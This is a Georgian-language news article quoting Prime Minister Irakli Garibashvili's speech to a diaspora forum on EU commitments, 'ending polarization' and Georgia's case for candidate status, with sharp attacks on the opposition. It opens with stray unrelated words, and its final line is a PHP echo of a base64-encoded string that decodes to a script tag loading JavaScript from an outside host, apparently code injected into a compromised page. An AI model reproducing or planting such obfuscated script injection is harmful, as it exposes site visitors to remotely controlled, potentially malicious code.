celsiusi
ავერსი შნაიდერი

ევროკომისიის ვალდებულებების შესრულება დავიწყეთ დაუყოვნებლივ. პარლამენტის თავმჯდომარემ, შალვა პაპუაშვილმა პირადად უხელმძღვანელა პროცესს, ჩვენმა საპარლამენტო გუნდმა და მთლიანად ჩვენმა უმრავლესობამ. ყველა ვალდებულება ძალიან დროულად შესრულდა და რაიმე პატარა ხარვეზი თუ არის დარჩენილი, მაგას ძალიან მალე გავასწორებთ. ჩვენ ეს პროცესი მივიყვანეთ თითქმის ბოლომდე და ალბათ ივნისის ბოლომდე დაიხურება ყველაფერი. დარჩა ერთი მთავარი – პოლარიზაციის დასრულება, – ამის შესახებ საქართველოს პრემიერ-მინისტრმა, ირაკლი ღარიბაშვილმა ქართული დიასპორის დღისადმი მიძღვნილ ფორუმზე სიტყვით გამოსვლისას განაცხადა.

მთავრობის მეთაურმა აღნიშნა, რომ ევროპელი მეგობრები საქართველოს პოლარიზაციის დასრულებისკენ მოუწოდებენ. მისივე თქმით, თუ მათ რეალურად სურთ, ქვეყანაში მშვიდობის, სტაბილურობის, განვითარების შენარჩუნება და, რაც მთავარია, მათ მიერ განსაზღვრული პრიორიტეტის, ნომერ პირველი ვალდებულების შესრულება – პოლარიზაციის დასრულება, მაშინ ქვეყანამ უნდა მიიღოს კანდიდატის სტატუსი.

„ჩვენმა ევროპელმა მეგობრებმა გვითხრეს, რომ თქვენ უნდა დაასრულოთ პოლარიზაცია. თქვენ თუ ახლა გადახედავთ, რაზე არის მთავარი პოლარიზაცია და რაზე ავრცელებენ ამდენ ტყუილს, ცილისწამებას, დეზინფორმაციას, და მე მჯერა, რომ თქვენ ძალიან ბევრ დეზინფორმაციას ისმენთ, მით უმეტეს, დღეს მედიაგარემო არის აბსოლუტურად გახსნილი. ათეულობით მედია არსებობს საქართველოში. აბა, გაიხსენეთ, რამდენი მედია, ტელევიზია იყო თავისუფალი, ოპოზიციური 2012 წლამდე, გახსენდებათ რომელიმე? ერთი იყო, რომელიც „ქართულმა ოცნებამ“ დააფუძნა – „მეცხრე არხი“ და საბაჟოზე უწვავდნენ ანტენებს და საშინელებები ხდებოდა. სიგნალის გავრცელების საშუალება არ ჰქონდა. ეს გარემო იყო, მეგობრებო, დღეს რომ გამოდიან და აკრიტიკებენ ჩვენს ხელისუფლებას. ეს ყველაფერი შედარებისთვის გავიხსენე. რჩება, ესე იგი, მთავარი თემა – პოლარიზაციის დასრულება. ის გუნდი, რომელიც იყო აბსოლუტურად ანტიპოდი, ანტიევროპული, ანტისახელმწიფოებრივი, ანტიეროვნული ძალა, გვეუბნება ჩვენ, ვინც მაქსიმუმი გააკეთა ბოლო 10 წლის განმავლობაში ევროინტეგრაციის გზაზე და თუნდაც ნატო-ს მიმართულებითაც. მე ვიყავი ის პრემიერ-მინისტრი, რომელმაც ნატო-ს გენმდივანთან ერთად 2015 წელს გავხსენი ერთობლივი საწვრთნელი ცენტრი კრწანისში. ეს გუნდი გვეუბნება, რომ თურმე ისინი მიაღწევდნენ და მიაღწევენ, ჯალათები, სადისტების და მკვლელების პარტია, ომის პარტია. გვისმენს ჩვენი დიასპორა და მინდა, კარგად გაიგონ ჩვენი სათქმელი. ამიტომ ჩემი გზავნილი იყო გუშინ შემდეგი, რომ მჯერა და მინდა, დავიჯერო, რომ ასე არის უმეტესობა და უმრავლესობა ჩვენი ევროპელი მეგობრების, ჩვენ ამაში დარწმუნებას ვცდილობთ დღენიადაგ, ყოველდღიურად მეც, საგარეო საქმეთა მინისტრი, პარლამენტის თავმჯდომარე – ყველა, მთელი გუნდი, მათ თუ რეალურად სურთ ქვეყანაში მშვიდობის, სტაბილურობის, განვითარების შენარჩუნება და, რაც მთავარია, მათ მიერ განსაზღვრული პრიორიტეტის, ნომერ პირველი ვალდებულების შესრულება, პოლარიზაციის დასრულება, მაშინ ქვეყანამ უნდა მიიღოს კანდიდატის სტატუსი, რადგან ამას ჩვენი ხელისუფლება, ჩვენი ხალხი და ჩვენი ქვეყანა იმსახურებს. ჩვენ მიერ განვლილი გზით, ომებით, ბრძოლით, რითიც დღემდე მოვედით,“- აღნიშნა პრემიერმა.

283
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");